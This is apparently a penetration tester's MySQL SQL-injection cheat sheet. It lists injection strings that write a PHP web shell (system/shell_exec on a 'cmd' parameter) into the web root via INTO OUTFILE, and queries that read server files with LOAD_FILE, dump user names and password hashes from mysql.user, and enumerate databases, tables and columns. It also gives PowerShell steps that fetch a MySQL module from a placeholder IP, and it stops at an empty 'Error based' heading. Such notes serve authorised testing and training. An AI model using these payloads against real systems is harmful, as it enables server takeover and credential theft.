sqli mysql

Checks for UDF loading (only meaningful if connected as root on MySQL)

# check whether the server restricts where files may be read from or written to (secure_file_priv); an empty value means no restriction
SHOW VARIABLES LIKE "secure_file_priv";

# directory from which the server loads plugin (UDF) libraries
@@plugin_dir;
SHOW VARIABLES LIKE 'plugin_dir';

# list all server variables
SHOW variables;

# show the privileges granted to the current account
SHOW Grants;

SQLi shell

# windows
?id=1 union all select 1,2,"<?php echo system($_GET['cmd']);?>",4 into OUTFILE 'c:/xampp/htdocs/cmd.php'

# linux
?id=1 union all select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4 into OUTFILE '/var/www/html/cmd.php'
# try: "<?php echo exec($_GET["cmd"]);"
# try: replace "php-payload" with (php-payload)

my-sql commands

# comments
#
--
/* <blah> */

# concatenation
# 0x3a is the hex form of ':' and separates the two fields
concat(col_1,col_2)
concat(col_1,0x3a,col_2)
concat(0x28,col_1,0x3a,col_2,0x29)
col_1|| '~' || col_2

# hostname
@@hostname

# data directory
@@datadir

# version
@@version
version()

# read-file
# C:\Windows\System32\Drivers\etc\hosts
# C:\\Windows\\System32\\Drivers\\etc\\hosts
LOAD_FILE('<file>')
TO_BASE64(LOAD_FILE('<file>'))

# users
user()
system_user()
| SELECT user FROM mysql.user

# password (md5)
# TO_BASE64(password)
| SELECT password FROM mysql.user

# databases
database()
| SELECT schema_name FROM information_schema.schemata;

# tables
SELECT table_name FROM information_schema.tables WHERE table_schema='<db>'
# alternatively: WHERE table_schema IN (0x<db-in-hex>, 0x<db-in-hex>) (table_schema holds the database name)

# columns
SELECT column_name FROM information_schema.columns WHERE table_name='<table>'
describe [<db>.]<table>

# n-th row (offsets are zero-based)
# total row count
SELECT count(*) FROM <table>
# walk the rows one at a time by incrementing <n>
SELECT <col> FROM <table> LIMIT <n>,1
SELECT <col> FROM <table> LIMIT 1 OFFSET <n>

mysql w/ powershell

wget https://github.com/adbertram/MySQL/archive/master.zip -O MySQL.zip

# setup
Invoke-WebRequest  -Uri http://IP/MySQL.zip -OutFile 'C:\MySQL.zip'

$modulesFolder = 'C:\Program Files\WindowsPowerShell\Modules'
Expand-Archive -Path C:\MySql.zip -DestinationPath $modulesFolder
Rename-Item -Path "$modulesFolder\MySql-master" -NewName MySQL

# usage — the literal password below lands in the script file and shell history; Get-Credential prompts for it instead
$user = '<user>'
$password = ConvertTo-SecureString '<password>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($user, $password)

Connect-MySqlServer -Credential $credential -ComputerName 'localhost' -Database "<db>"
Invoke-MySqlQuery  -Query "select @@version;"

Error based
